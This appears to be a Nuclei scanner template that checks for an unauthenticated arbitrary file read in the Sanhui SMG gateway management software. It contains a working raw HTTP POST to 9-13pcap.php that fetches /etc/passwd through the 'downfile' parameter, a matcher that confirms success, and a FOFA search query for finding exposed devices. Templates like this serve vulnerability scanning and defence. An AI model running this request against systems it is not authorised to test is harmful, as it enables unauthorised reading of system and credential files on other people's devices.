http:
    - matchers:
        - part: body
          regex:
            - root:.*:0:0
          type: regex
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "POST /en/9-13pcap.php HTTP/1.1\nHost: {{Hostname}} \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ndown=1&downfile=/etc/passwd\n"
id: SMG-9-13pcap_php-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="text ml10 mr20" && (title="网关管理软件" || title="Gateway Management")
        三汇 SMG网关管理软件 9-13pcap.php 接口处任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 三汇 SMG网关管理软件 9-13pcap.php 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/x2sr7J9ZjUFTH4QkHPsCWQ
    severity: high
    tags:
        - File reading
